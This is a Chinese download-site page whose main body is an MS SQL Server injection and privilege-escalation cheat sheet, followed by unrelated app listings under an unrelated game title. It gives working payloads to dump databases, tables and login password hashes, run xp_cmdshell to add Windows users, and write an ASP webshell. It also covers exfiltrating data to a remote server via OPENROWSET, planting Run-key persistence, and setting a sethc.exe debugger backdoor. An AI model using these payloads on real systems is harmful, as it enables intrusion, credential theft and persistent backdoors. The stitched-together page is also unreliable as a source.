1.爆所有库名源星战域下载-源星战域游戏1.0.6 官方版
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases
//name数据库名filename数据库物理路径
+union+select+name,filename,3,4,5+from+master.dbo.sysdatabases+where+and+dbid=x+filename>0
//爆破数据库路径换dbid值就可以

+union+select+1,(select+name+from+master.dbo.sysdatabases+for+xml+path),3,4,5–
and0<>db_name(n)–
n改成0,1,2,3……就可以跨库
2.爆所有表名
+union+select+table_name,2,3,4,5+TABLE_CAtalog,table_schema+from+information_schema.tables–
//table_catalo保存当前数据库名称,table_name保存当前数据库中所有表
+select+name,id,crdate,4,5+from+数据库名.dbo.sysobjects+where+xtype=’u.+and+status>=0–
//name表名id表的idxtype=’u’u代表用户自定义的表crdate为数据库的创建时间ststus>=0
/+union+select+name,object_id,3,4,5+fromsys.tables–
3.爆所有字段名
+union+select+name,id,3,4,5+from+数据库名称.dbo.syscolumns+where+xtype=167+and+id=5575058–
//id是在爆破表名时候的id值syscolumns中的id和sysobjects中的id主外键关系
+union+select+name+from+syscolumns+where+charindex(‘pass’,name)>0
//查询含有“pass”的字段
+union+SELECTname,2,3,4,5FROMsyscolumnsWHEREid=(SELECTidFROMsysobjectsWHEREname=‘yixiang_bizre’)
//查询yixiang_bizre表中的所有字段
+union+select+table_name,column_name,3,4,5+from+information_schema.COLUMNS–
//table_name表名称column_name字段名
4.添加用户
1、declare@oint;
2、execmaster..sp_oacreate'Shell.Application',@oout;
3、execmaster..sp_oamethod@o,'ShellExecute',NULL,'cmd.exe','/cnetuserfuckfuck/add
5.判断是不是SQL库
andexists(select*fromsysobjects)
6.所有账户名
+union+select+(selectname+’||’+password_hashfrom+sys.sql_loginsforxmlpath),2,3,4,5+from+sys.sql_logins//
7.加SQL账户
1、--创建个登陆mssql的帐号
2、;execmaster.dbo.sp_addloginname,pass;--
3、--把创建的mssql登陆帐号提升到sysadmin
4、;execmaster.dbo.sp_addsrvrolemembername,sysadmin;--
8.启动组写入命令行和执行
EXECmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE’,’SOFTWAREMicrosoftWindowsCurrentVersionRun’,’help1′,’REG_SZ’,’cmd.exe/cnetusertestptlove/add’-
9.LCX语句
;execmaster..xp_cmdshell‘D:m目录lcx.exe-slave本机ip51目标内网ip3389′–
//目标机器执行
lcx.exe-listen512007
//本机执行连接本机的的2007端口就可以了
10.win200爆目录
xp_regread读取HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtualRoots–
//获取WEB路径
11.恢复xp_cmdshell
;EXECmaster.dbo.sp_addextendedproc‘xp_cmdshell’,’e:inetpubwwwrootxplog70.dll’
//把xplog70.dll文件给他上传到e:inetpubwwwroot目录下了
12.open数据
insertintoOPENROWSET(‘SQLOLEDB’,‘server=ip;uid=user;pwd=123456!’,‘selectcfromcmd’)selectusernamefromtest
//把test是本地表,中username的值插入到远程cmd表中的c字段里
13.判断权限
1、+and+1=(select+IS_SRVROLEMEMBER('sysadmin'))--
2、//sa权限
3、and(selectIS_MEMBER('db_owner'))=1-- // dbo
4、and(selectIS_MEMBER('public'))=1-- //public
14.DIR目录
遍历系统的目录结构,分析结果并发现WEB虚拟目录,先创建一个临时表:
temphttp://www.XXXX.com/FullStory.asp?id=1;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));
–接下来:我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;inserttempexecmaster.dbo.xp_availablemedia;–?我们可以通过查询temp的内容来获得驱动器列表及相关信息或者利用xp_subdirs获得子目录列表,并存入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id)execmaster.dbo.xp_subdirs‘c:’;–?
我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中:http://www.XXXX.com/FullStory.asp?id=1;insertintotemp(id,num1)execmaster.dbo.xp_dirtree‘c:’;–
这样就可以成功的浏览到所有的目录(文件夹)列表?如果我们需要查看某个文件的内容,可以通过执行xp_cmdsell:;insertintotemp(id)execmaster.dbo.xp_cmdshell‘typec:webindex.asp’;–?
使用’bulkinsert’语法可以将一个文本文件插入到一个临时表中。
如:bulkinserttemp(id)from‘c:inetpubwwwrootindex.asp’浏览temp就可以看到index.asp文件的内容了!通过分析各种ASP文件,可以得到大量系统信息,WEB建设与管理信息,甚至可以得到SA帐号的连接密码。
15.判断站库分离
+and+host_name()==@@servername-- //判断站库是否分离
16.存储总结
xp_availablemedia显示系统上可用的盘符’C:’xp_availablemedia
xp_enumgroups列出当前系统的使用群组及其说明xp_enumgroups
xp_enumdsn列出系统上已经设置好的ODBC数据源名称xp_enumdsn
xp_dirtree显示某个目录下的子目录与文件架构xp_dirtree‘C:inetpubwwwroot’
xp_getfiledetails获取某文件的相关属性xp_getfiledetails‘C:inetpubwwwroot.asp’
dbp.xp_makecab将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开
dbp.xp_makecab’C:lin.cab’,’evil’,1,’C:inetpubmdb.asp’
xp_unpackcab解压缩xp_unpackcab‘C:hackway.cab’,’C: emp’,1
xp_ntsec_enumdomains列出服务器域名xp_ntsec_enumdomains
xp_servicecontrol停止或者启动某个服务xp_servicecontrol‘stop’,’schedule’
xp_terminate_process用pid来停止某个执行中的程序xp_terminate_process123
dbo.xp_subdirs只列某个目录下的子目录dbo.xp_subdirs‘C:’
17.判断xp_cmdshell
+and+1=(select+count(*)+FROM+master.dbo.sysobjects+where+xtype+=‘X’+AND+name+=‘xp_cmdshell’)
18.判断系统为win2003
And+charindex('5.3',@@verisdn)
19.echo写shell
;execmaster.dbo.xp_cmdshell'echo^<scriptlanguage=VBScriptrunat=server^>executerequest^("^)^</script^>>c:\mu.asp'-
20.停掉服务
execmaster..xp_servicecontrol‘stop’,’schedule’
execmaster..xp_servicecontrol‘start’,’schedule’
有多少删减。另外添加几句个人经常用到的SQL注入和提权的语句
当xp_cmshell被删除或者无法使用的情况,我们不妨试试利用SP_OACreate和SP_OAMETHOD调用系统wscript.shell执行系统命令。
Declare@runshellINT
ExecSP_OACreate‘wscript.shell’,@runshellout
ExecSP_OAMeTHOD@runshell,’run’,null,’netuserlengflengf/add’
当这些都失败了,试试关闭系统沙盒模式,它在注册表的位置是
HKEY_LOCAL_MACHINESoftwareMicrosoftJet4.0EngineSandBoxMode
默认键值为2,即只在Access的模式下开启沙盒模式,对应的键值是
0—在任何所有者中禁止启用安全模式
1–为仅在允许范围内
2–必须在access模式下
3–完全开启
我们要将其设置为0就可以关闭了,通过SQL语句实现
Execmaster.dbo.xp_regwrite‘HKEY_LOCAL_MACHINE,’SoftwareMicrosoftJet4.0Engine’,’SandBoxMode’,’REG_DWORD’,0
执行关闭成功后就可以执行系统命令
select*fromOpenRowSet(‘Microsoft.Jet.OLEDB.4.0′,’;DataBase=c:windowssystem32iasias.mdb’,’selectshell(“netuserlengflengf/add”)’)
上面是提权思路。另外提下两种备份:
(1)Log备份(hta)
alertdatabase[dbname]setRECOVERYFULL–
createtablecmd(aimage)–
backuplog[dbname]todisk=’c:hta’withinit–
insertintocmd(a)values(‘[command]‘)–
backuplog[dbname]todisk=’系统启动目录hello.hta’–
droptablecmd–
(2)差异备份
backupdatabase[dbname]todisk=’c:db.bak’–
createtablecmd(cmdimage)–
insertintocmd(cmd)values(‘[command]‘)–
backupdatabase[dbname]todisk=’系统启动目录hello.hta’WITHDIFFERENTIALFORMAT–
droptablecmd–
经验告诉我,将你要执行的command转换成十六进制成功率会比较高,但是这个比较被动。
另外就是可以通过注册表添加run启动项添加用户命令,这种也是被动,要等服务器重启。
看了这个工具,觉得还缺少一个很使用的方法,那就是映像劫持,位于注册表位置:
HKEY_LOACAL_MACHINESoftwareMicrosoftWindowsNTCurrentVersionImageFileExecutionOptions
在这个键下面有一个Debugger的参数,如果不为空,就会处理。添加映像劫持方法的SQL语句如下:
execMaster.dbo.xp_regWrite‘HKEY_LOACAL_MACHINE’,’Software\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe’,’debugger’,’REG_SZ’,’c:windowssystem32cmd.exe’
菲哥哥注入语句笔记是一款sql注入工具,它可以注入一些要注意的东西,Sql注射经验,写成笔记了。
展开内容
世界杯扫盲6.0 官网最新版
香港智能公交车app下载-香港巴士通app5.9.0安卓最新版
3d世界街景地图下载-3D世界街景地图免费版2.1.7 安卓版
java class反编译工具(Class反编译工具jd-gui)0.3.5 单文件版
几何弹珠手游下载-几何弹珠安卓版1.5.3179 最新版
磁盘监视器 绿色免费版V1.95
女神消消消下载-女神消消消新版本1.1.0.00790002 安卓版
x64dbg下载-x64dbg(程序逆向反汇编修改神器)2022.07.27 简体中文版
3dm game安卓版下载-3dm论坛app1.0官网最新版
visualSVN Server下载-VisualSVN Server(集成SVN服务端工具)v3.6.1官网版
蜀门手游官网下载-蜀门手游官网安卓版2.71官方版
趣美街-趣美街(积分购物)1.1 用户版
鏖战三国官方下载-鏖战三国安卓版5.2.6 正式版
正义荣耀星耀特权下载-正义荣耀星耀版1.0 特权版下载
tophome app-TopHome_Android(智能家居)3.0.3 安卓最新版
fall master游戏下载-Fall Master(秋天的主人手游)1.0.2 休闲版
2345安全卫士电脑版下载-2345安全卫士增强版3.9.0.10353 官方最新版
小石回家apk-小石回家门禁3.01.12 安卓版
网页游戏变速器2017-吾爱破解游戏变速精灵(吾爱游戏变速专家)2017 宇宙变速专版
LeapMusic软件下载-LeapMusic软件5.5 安卓版
安全生产法律法规清单-安全生产法律法规及其要求清单(企业适用)doc格式【word最新版】
雪莲花游戏下载-雪莲花官方正版1.1最新版
大学生个人简历ppt模板下载-大学生个人简历ppt模板最新版
我画画特牛手游下载-我画画特牛安卓版1.0 官方版
炫酷汽车盒子下载-炫酷汽车盒子app1.0 手机版
8.2/218.8M
非常有趣且魔性的小游戏,Twirlio手游中玩家操作两个旋转的球去收集路上的金币和躲避图形块,一定要控制好球的旋转力度,获得高分很难,有兴趣的来挑战一下。玩法介...
9.7/1,542.2M
农佳云app是一款服务于三农的农业互联网云平台应用程序,主要面向中大型农牧企业及其相关从业者,提供手机端购物平台,采用购物车模式,经销商、养殖户、业务员等都能通...
微信公众号助手app官方下载安装-公众号助手下载安装3.4.0 官方版
8.1/1,673.8M
腾讯开发的公众号助手是一款便捷的微信公众号管理工具,支持内容发布、数据统计(浏览量/点赞量)、读者互动回复,并提供详细教程帮助用户快速上手运营公众号。微信公众号...
9.9/1,676.3M
热播短视频app是一款类似于抖音的短视频平台,这里汇聚了各种好玩有趣的视频,只需要划一划就能观看不同类型的视频内容,还能结交很多志同道合的朋友,如果你也喜欢玩短...
腾讯游戏鸿图之下测试版下载-鸿图之下体验服1.0.41 内测版
8.4/1,042.8M
鸿图之下体验服是一款以UE4引擎打造的三国题材策略类游戏,游戏中玩家们能够在最为顶尖的画面中来感受到上到高山丘岭,下到平原河流的生动景象。同时还有极强的策略式玩...
帮助文件制作软件(Qt Assistant)4.7.3 绿色免费版
8.7/1,326.8M
QtAssistant是Qt自带的一款可定制、可重新发行的帮助文件浏览器。QtAssistant支持HTML文件,用户可以利用其定制自己的功能强大的帮助文档浏览...
ps光晕笔刷素材合集-139款高清光晕笔刷【梦幻唯美】abr文件免费下载
9.1/1,759.1M
我们可以使用ps光晕笔刷打造出非常唯美梦幻的画面,今天小编就为大家整理了139款高清光晕笔刷,包含了常见的效果,如星光,镜头虚化,光点等,点击下面的地址即可免费...
在山的那边ppt免费下载-人教版七年级在山的那边ppt免费课件最新版
9.1/1,279.1M
人教版七年级在山的那边ppt免费课件是为关大哥初一七年级的语文老师们带来的《在山的那边》课件模板,内容精致,需要的老师们欢迎下载使用。人教版七年级在山的那边pp...
9.6/640.6M
水印相机大师app是一款简单易用的手机加水印软件,支持图片、相机和视频自定义加水印,界面简洁,安装包精简,可以多张图片同进加水印,很简单易用。支持自定义照片水印...
10.0/1,339.0M
心语输入法APP是一款适配安卓手机的多功能实用工具类输入法软件,以“个性化定制+多元化输入+高情商辅助”为核心特色,集成语音转换、聊天话术、恋爱指导等丰富功能,...
有省app-返点点(有省app免费版下载)v1.1.55 官方版
9.3/1,632.0M
有省app是一款省钱购物的在线商城app,有省app商品种类丰富多样,界面简洁易使用,还集合了许多外卖平台,还可以在上面点餐喲!每日都有特惠折扣商品购物返利轻松...
9.3/1,173.4M
这是一款角色传奇游戏,在屠龙决战沙城BT版里,玩家上线即可领取相关福利同时各种神装神器你都将拥有,拉上好友一起来决战沙城,你将成为城市的主角,尽情的战斗吧!我屠...
快乐星球app下载-快乐星球盲盒app2.3.24 安卓正版
9.4/467.5M
在线抽盲盒年轻人的新玩法,盲盒星球app这里有很多新奇的潮玩,大热门的系列这里都能满足你,通过各大快递送货上门。快乐星球app是干什么的快乐星球app是一款时下...
LZZ影音播放器纯净版下载-LZZ影音播放器4.3.1绿色版
7.6/1,515.1M
LZZ影音播放器是款万能的在线看视屏直播的软件,他包含了斗鱼哔哩哔哩等多个热门直播的平台软件,都可以同时在线观看,功能很强大,还支持其他直播源软件的导入。使用说...
新纪元传奇起航2.4下载-新纪元传奇起航2.4正式版【隐藏英雄密码及攻略】
8.6/1,897.8M
新纪元传奇起航2.4是一款魔兽ORPG地图,支持1-5人游戏,新纪元传奇起航正式版2.4新增装备龙胆枪,新增VIP地图BOSS之家,喜欢的玩家可以免费下载。地图...
美萌小说app最新版下载-美萌小说无广告版2.0.1 安卓版
8.7/777.7M
美萌小说无广告版软件内包含了非常多不同题材的小说,都市、言情、校园、总裁、穿越、架空、历史、仙侠、武侠等等十余种小说题材,满足不同用户的喜好,有什么想看的小说可...
9.9/1,735.6M
次元滤镜app是一款可以让用户打造更多不同风格的手机滤镜软件,这里有丰富全面的滤镜素材都可以去进行选择使用,让每位用户都可以使用到最新的滤镜素材,处理编辑图片十...
10.0/1,044.1M
昆仑墟回收换充值是一款武侠战斗角色扮演rpg手游。游戏有着丰富的玩法内容,跨服战场,多服高手同台竞技。玩家可以选择喜欢的职业加入战斗进行pk,冰火战场,号令阵营...
ROM周边搬运工具下载-ROM周边搬运工具20210413 最新版
9.4/635.6M
很小巧的一款工具,ROM周边搬运工具2021从海量的周边文件中匹配自己选择出来的ROM,这样就能最大程度减少模拟器整合包的文件大小。喜欢整理MAMEFBNEO模...
超级进化模拟器游戏下载-超级进化模拟器1.0.0804 手机版
9.7/269.1M
超级进化模拟器是一款关于超能力的冒险手游,在游戏中玩家可以逐渐变强,获取各种超能力或者装备,一次次冒险中消灭所有敌人,玩起来很有意思,感兴趣的小伙伴快来uzzf...
奇妙运动日记下载-奇妙运动日记游戏9.61.20.00 最新版
8.4/1,167.8M
【奇妙运动日记】邀请宝宝参加“运动会”、一起快乐运动啦!在这里,宝宝不仅能体验冬季专项运动:滑雪、滑冰、打冰球等;还可尝试各项趣味竞技活动:跳绳、投篮、丢沙包…...
郑州掌上人社安卓版-郑州掌上人社手机app2.1.122 官网最新版
9.2/1,012.7M
在郑州的朋友你想在自己的手机上面时刻的查询你的社保信息的话,你可以在自己的手机上使用郑州掌上人社手机app测试版,你的人社保你可以自己一清二楚!郑州掌上人社手机...
8.8/385.2M
乱世群英传单机版是一款策略性极强的三国对战手游,玩家需要将人物都一一解锁,自由组队,每个人物的技能和武器都是不同的。玩家可以根据每次要出战的情况,合理安排人物队...
移动人人通教师版下载-云南移动人人通(老师版)2.0.0 安卓最新版
9.2/460.7M
云南移动人人通老师版是一款教育方面的在线沟通软件,为老师与学生家长的沟通提供了方便,方便老师管理班级和与学生家长的沟通,让学校教育更智能、信息化!移动人人通介绍...
StephMoji官网下载-StephMoji安卓版1.1.2 官方最新版
8.0/1,960.9M
这是斯蒂芬-库里自己推出的一款个人appStephMoji安卓版的下载,里面含很多有关库里的表情包,各种有趣的库里打球瞬间都以卡通的形式做成表情包,非常的有趣,...